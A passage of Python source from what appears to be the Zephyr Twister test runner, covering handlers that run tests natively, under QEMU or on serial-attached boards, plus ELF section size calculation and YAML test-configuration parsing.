self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
if run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
